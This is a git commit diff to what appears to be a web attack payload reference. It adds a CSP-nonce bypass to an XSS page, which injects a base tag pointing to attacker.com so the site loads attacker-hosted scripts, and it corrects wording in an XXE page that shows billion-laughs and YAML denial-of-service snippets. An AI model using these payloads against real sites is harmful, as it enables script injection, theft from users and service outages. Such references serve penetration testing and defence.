Bypass CSP, technique from #715

This commit is contained in:
Swissky 2024-11-02 12:26:45 +01:00
parent d0c4454ef2
commit 9866fef5b4
2 changed files with 32 additions and 10 deletions

View File

@ -83,6 +83,8 @@
- [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline) - [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline)
- [Bypass CSP script-src self](#bypass-csp-script-src-self) - [Bypass CSP script-src self](#bypass-csp-script-src-self)
- [Bypass CSP script-src data](#bypass-csp-script-src-data) - [Bypass CSP script-src data](#bypass-csp-script-src-data)
- [Bypass CSP nonce](#bypass-csp-nonce)
- [Bypass CSP header sent by PHP](#bypass-csp-header-sent-by-php)
- [References](#references) - [References](#references)
## Vulnerability Details ## Vulnerability Details
@ -1308,6 +1310,26 @@ Source: [@404death](https://twitter.com/404death/status/1191222237782659072)
``` ```
### Bypass CSP nonce
**Requirements**:
* CSP like `script-src 'nonce-RANDOM_NONCE'`
* Imported JS file with a relative link: `<script src='/PATH.js'></script>`
**Payload**:
1. Inject a base tag.
```html
<base href=http://www.attacker.com>
```
2. Host your custom js file at the same path that one of the website's script.
```
http://www.attacker.com/PATH.js
```
### Bypass CSP header sent by PHP ### Bypass CSP header sent by PHP
**Requirements**: **Requirements**:

View File

@ -2,10 +2,10 @@
> An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server. > An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server.
**Internal Entity**: If an entity is declared within a DTD it is called as internal entity. **Internal Entity**: If an entity is declared within a DTD it is called an internal entity.
Syntax: `<!ENTITY entity_name "entity_value">` Syntax: `<!ENTITY entity_name "entity_value">`
**External Entity**: If an entity is declared outside a DTD it is called as external entity. Identified by `SYSTEM`. **External Entity**: If an entity is declared outside a DTD it is called an external entity. Identified by `SYSTEM`.
Syntax: `<!ENTITY entity_name SYSTEM "entity_value">` Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
## Summary ## Summary
@ -19,9 +19,9 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
- [PHP Wrapper inside XXE](#php-wrapper-inside-xxe) - [PHP Wrapper inside XXE](#php-wrapper-inside-xxe)
- [XInclude attacks](#xinclude-attacks) - [XInclude attacks](#xinclude-attacks)
- [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks) - [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks)
- [Exploiting XXE to perform a deny of service](#exploiting-xxe-to-perform-a-deny-of-service) - [Exploiting XXE to perform a denial of service](#exploiting-xxe-to-perform-a-denial-of-service)
- [Billion Laugh Attack](#billion-laugh-attack) - [Billion Laugh Attack](#billion-laugh-attack)
- [Yaml attack](#yaml-attack) - [YAML attack](#yaml-attack)
- [Parameters Laugh attack](#parameters-laugh-attack) - [Parameters Laugh attack](#parameters-laugh-attack)
- [Exploiting Error Based XXE](#exploiting-error-based-xxe) - [Exploiting Error Based XXE](#exploiting-error-based-xxe)
- [Error Based - Using Local DTD File](#error-based---using-local-dtd-file) - [Error Based - Using Local DTD File](#error-based---using-local-dtd-file)
@ -219,7 +219,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
``` ```
## Exploiting XXE to perform a deny of service ## Exploiting XXE to perform a denial of service
:warning: : These attacks might kill the service or the server, do not use them on the production. :warning: : These attacks might kill the service or the server, do not use them on the production.
@ -236,7 +236,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
<data>&a4;</data> <data>&a4;</data>
``` ```
### Yaml attack ### YAML attack
```xml ```xml
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
@ -491,7 +491,7 @@ XML parsers uses 4 methods to detect encoding:
* XML declaration: `<?xml version="1.0" encoding="UTF-8"?>` * XML declaration: `<?xml version="1.0" encoding="UTF-8"?>`
| Encoding | BOM | Example | | | Encoding | BOM | Example | |
|----------|----------|-------------------------------------|--------------| | -------- | -------- | ----------------------------------- | ------------ |
| UTF-8 | EF BB BF | EF BB BF 3C 3F 78 6D 6C | ...<?xml | | UTF-8 | EF BB BF | EF BB BF 3C 3F 78 6D 6C | ...<?xml |
| UTF-16BE | FE FF | FE FF 00 3C 00 3F 00 78 00 6D 00 6C | ...<.?.x.m.l | | UTF-16BE | FE FF | FE FF 00 3C 00 3F 00 78 00 6D 00 6C | ...<.?.x.m.l |
| UTF-16LE | FF FE | FF FE 3C 00 3F 00 78 00 6D 00 6C 00 | ..<.?.x.m.l. | | UTF-16LE | FF FE | FF FE 3C 00 3F 00 78 00 6D 00 6C 00 | ..<.?.x.m.l. |